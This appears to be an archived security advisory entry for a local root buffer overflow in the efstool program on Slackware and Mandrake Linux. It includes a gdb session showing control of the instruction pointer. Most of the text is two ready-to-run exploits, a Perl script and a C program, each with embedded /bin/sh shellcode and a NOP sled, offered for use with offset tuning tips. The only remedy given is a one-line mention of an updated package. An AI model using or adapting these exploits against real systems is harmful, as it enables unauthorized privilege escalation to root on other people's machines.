|
COMMAND efstool local root exploit (buffer overflow) SYSTEMS AFFECTED slackware 8, mandrake 8, mandrake 7.1 PROBLEM clorox 'max' says : An error in the efstool program on redhat, mandrake, and slackware is able to be successfully exploited through a buffer overflow. [clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'` Segmentation fault [clorox@ptnw clorox]$ gdb efstool GNU gdb 5.1.1 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-mandrake-linux"...(no debugging symbols found)... (gdb) r `perl -e 'print "A" x 3000'` Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'` (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info reg esp esp 0xbfffe890 0xbfffe890 (gdb) Example ======= #!/usr/bin/perl # efstool root exploit # written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp) # give the campers internet grogan! # # tested to work on slackware 8, mandrake 8, mandrake 7.1 # tweaks may be needed on the offset # method 1 works more often but # method 2 is faster but not too good # # # enjoy -clorox # perl efs.pl -1000 $shellcode = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89". "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3". "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29". "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff". "/bin/sh"; $shellcode2 = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88". "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3". "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31". "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". "\xff\xff/bin/sh"; $ret = "0xbfffe890"; $offset = $ARGV[0]; $nop = "\x90"; if ($ARGV[1] eq "m1") { $len = 3000; for ($i = 0; $i < ($len - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; } elsif ($ARGV[1] eq "m2") { $len = 10010; for ($i = 0; $i < ($len - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode2; } else { print "You must specify a method fool!\n"; print "perl $0 <offset> m1 or m2\n"; } $buffer .= pack('l', ($ret + $offset)); $buffer .= pack('l', ($ret + $offset)); exec("efstool $buffer"); -Or- /* efstool.c - efstool/bof simple overflow in efstool, * * * This code is published propterty of CloudAss, you may * duplicate this in any shape or form without prior written * permission from CloudAss. * * Bug discovered by ntfx, just figured I'd code a decent * exploit for it. * * * DISCLAIMER - I am in no way affiliated with ntfx or any members of * soldierx or legion2002 security. * * Usage: ./efsroot offset - bruteforce if neccesary * * Bug is pretty stupid, and simple, I have yet to see it give root. * efstool is not +s on slackware 8.0 , it should spawn a shell * regardless. * * (C) COPYRIGHT CloudAss , 2002 * all rights reserved *********************************************************************** */ #include <stdio.h> #include <string.h> #include <stdlib.h> #define SIZE 3000 #define NOP 0x90 #define PATH "/opt/gnome/bin/efstool" //-------------------------------------------------- long get_esp(void){ __asm__("movl %esp,%eax\n");} //-------------------------------------------------- char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char buffer[SIZE]; long retaddr, offset; int i; offset = atoi(argv[1]); retaddr = get_esp() + offset; for(i=0; i < SIZE; i+=4) *(long *)&buffer[i] = retaddr; for(i=0; i < strlen(shellcode); i++) *(buffer+i) = NOP; memcpy(buffer+i, shellcode, strlen(shellcode)); execl(PATH, "efstool", buffer, 0); return 0; } SOLUTION Updated package available ?